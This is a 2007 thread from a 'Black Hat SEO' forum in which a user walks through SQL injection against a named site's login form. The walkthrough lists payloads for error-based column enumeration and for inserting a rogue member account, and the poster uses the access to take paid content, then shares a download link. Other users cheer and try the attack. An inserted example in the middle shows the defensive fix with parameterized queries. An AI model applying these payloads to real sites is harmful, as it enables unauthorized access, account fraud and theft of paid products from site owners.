Site Hacking 101

Discussion in 'Black Hat SEO' started by nova, Nov 26, 2007.

  1. nova

    nova BANNED BANNED

    OK boys and girls. Here is how you can hack some sites using a method called SQL injection.

    Now as you all know, sites use databases to store their users' information. SQL Server from Microsoft is one of the popular databases and 99% of the time the sites using this database are coded in a language called ASP.

    The pages on such a site end with the extension .asp

    The first test we need to do is to find a form on such a site, say for example a login form. Now our objective is to create an account on such a site.

    I'll take a case study. Just today I got an email from an internet marketer promoting this.

    I mailed him about this vulnerability but he hasn't responded, so I guess he's not bothered about this.. oh well...

    http://www.adsalternative.com/index.asp

    So we go to the members login page

    http://www.adsalternative.com/members/login.asp

    BIG mistake letting people know the login page to the members area.

    Now we enter the ' character in the username field. We get this message.

    "Please ensure that you enter both your Username and your Password in order to log in to the members' area"

    Which means that he's validating both the username and password.

    So let's enter ' in both the fields and press login

    Which returns this error

    Code:
    "Microsoft OLE DB Provider for SQL Server error '80040e14' 
    
    Incorrect syntax near 'ds'. 
    
    /includes/databaseconnect.asp, line 21 "
    
    Which means that his ASP script isn't checking for the ' character and this is the basis of this exploit.

    Now we type

    ' having 1=1-- into the user name and ' into the password and press login


    Which returns us this error

    Code:
    Microsoft OLE DB Provider for SQL Server error '80040e14' 
    
    Column 'members.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. 
    
    /includes/databaseconnect.asp, line 21 
    
    So now we know that his table name is members and his first column is id.

    Now we use a "group by" SQL clause to find out the other column names

    so we type the user name as ' group by users.id having 1=1--
    and ' as the password and press login

    which returns the error

    Code:
    Microsoft OLE DB Provider for SQL Server error '80040e14' 
    
    Column 'members.emailAddress' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. 
    
    /includes/databaseconnect.asp, line 21 
    
    
    so we know his next column is emailAddress.

    Continuing in this manner, grouping by each column name, we get his whole table structure

    Once we have that all we need to do is insert a record with our name.

    So in the username field we enter

    Code:
    '; insert into members(username,password) values('jack', 'hack')--
    and in the password field we enter
    Code:
    '
    and press login

    This has created us an account with the username jack and the password hack.

    Now we can login with this username and password and download all his shite for free :D

    Another example of poor site protection :nutkick:

    So mods does this qualify for the VIP access :D






     
    • Thanks Thanks x 3
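
Added example, not part of the thread or of the site's code: the errors quoted in the first post appear because the login script concatenates form input into its SQL text and returns the raw database error to the browser. The sketch below puts that pattern beside a parameterized login with generic error handling. Python with sqlite3 stands in for the ASP/SQL Server stack so it runs offline, and the table layout, function names and sample user are assumptions.

```python
import hashlib
import hmac
import logging
import sqlite3

log = logging.getLogger("login")

def pw_hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db() -> sqlite3.Connection:
    # Constructed sample data; sqlite3 stands in for SQL Server.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT UNIQUE,"
               " salt BLOB, pw_hash BLOB)")
    salt = b"constructed-salt"
    db.execute("INSERT INTO members (username, salt, pw_hash) VALUES (?, ?, ?)",
               ("alice", salt, pw_hash("correct horse", salt)))
    return db

def check(row, password: str) -> str:
    # Constant-time hash comparison; unknown user and wrong password look the same.
    if row and hmac.compare_digest(row[1], pw_hash(password, row[0])):
        return "200 OK"
    return "401 Invalid login"

def login_vulnerable(db, username: str, password: str) -> str:
    # Anti-pattern 1: input is concatenated into the SQL text, so a quote alters the statement.
    sql = "SELECT salt, pw_hash FROM members WHERE username = '" + username + "'"
    try:
        return check(db.execute(sql).fetchone(), password)
    except sqlite3.Error as exc:
        # Anti-pattern 2: the raw database error is sent back to the client.
        return f"500 {exc}"

def login_safe(db, username: str, password: str) -> str:
    try:
        # The value is bound as a parameter and is never parsed as SQL.
        row = db.execute("SELECT salt, pw_hash FROM members WHERE username = ?",
                         (username,)).fetchone()
        return check(row, password)
    except sqlite3.Error:
        log.exception("login query failed")  # details stay in the server log
        return "500 Internal error"
```

On classic ASP with SQL Server the equivalent fix is a parameterized ADODB.Command (or a stored procedure) instead of concatenated SQL text, with custom error pages so OLE DB errors never reach the client.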
  2. trumpinc2000

    trumpinc2000 Registered Member

    You have been busy. Very nice share.:D
     
  3. paranoid1288

    paranoid1288 Junior Member

    nice share, keep your awesome hacks coming
     
  4. caroz

    caroz Registered Member

    nice post Nova, next time would be nice if you added some screenshots from step to step. I understood it but I think some people that are new to this will appreciate it! :)
     
  5. soulchief

    soulchief Junior Member

    wow, nice information. Now to secure my sites so this can't happen to me :p

    Edit: does this work for only .asp?
     
  6. justmeron

    justmeron Power Member

    Nice post.
    He must have deleted the account you created.
    I tried signing in using jack hack and got invalid username.
    Sounds complicated to me, I'm not a mod but sure qualifies for VIP to me.
     
  7. justmeron

    justmeron Power Member

    I tried to use it and like on step 2 when I put ' in both blanks it now gives me an error HTTP 500 Internal Server Error page cannot be displayed.
    So you must have gotten his attention and inspired some changes. :cool:
     
  8. onel

    onel Newbie

    I believe there's an equivalent for this in MySQL
     
  9. ceo

    ceo Newbie

    Wow.
    That was very well described nova.
    Good work !
     
  10. billa1

    billa1 Newbie

    it says login jack and hack is incorrect, can someone give new login? or reupload the stuff? thanks
     
  11. nova

    nova BANNED BANNED

    Yes it works on PHP sites as well, but magic quotes has to be disabled.

    There are other hacks for PHP as well. I'll post them in a new thread.

    About the current site, NO he hasn't fixed it.

    I created the "jack/hack" account again.

    Enjoy! :bukkake:


     
  12. hehe

    hehe Newbie

    Ergo he did change something in the backend but with the group by clause you can still get around it?
     
  13. travs

    travs BANNED BANNED

    hehehe I nominate that nova shall be granted a VIP access :D
     
  14. turket

    turket Newbie

    Very nice, phpnuke is filled with vulnerabilities like this, beware:)
     
  15. nova

    nova BANNED BANNED

    Still doesn't seem fixed LOL. I created 2 accounts again jack/hack and youare/solame


    http://img148.imageshack.us/my.php?image=24939471ht6.gif

    http://img137.imageshack.us/my.php?image=92518693dn0.gif

    http://img148.imageshack.us/my.php?image=41383314dr6.gif

    http://img518.imageshack.us/my.php?image=89304755bj9.gif


    :D

    Entire package: http://www.linkbucks.com/link/ff430729/7453






     
  16. Tony

    Tony Registered Member

    wow great tutorial thanks a lot :D
     
  17. artswerdstone

    artswerdstone Power Member

    Hi Nova,

    Congrats for the hack, and thanks for the links! I'd like to comment on them, but that should be another thread.
     
  18. artswerdstone

    artswerdstone Power Member

    Hi,

    After you're familiarized with Nova's great tutorial, maybe you'll want to have an SQL inj*ection cheat sheet hxxp://preview.***********/2ncvyx
     
  19. bboy69

    bboy69 Newbie

    This is great stuff mate, nice going.
     
  20. andrew777

    andrew777 Newbie

    thanks for sharing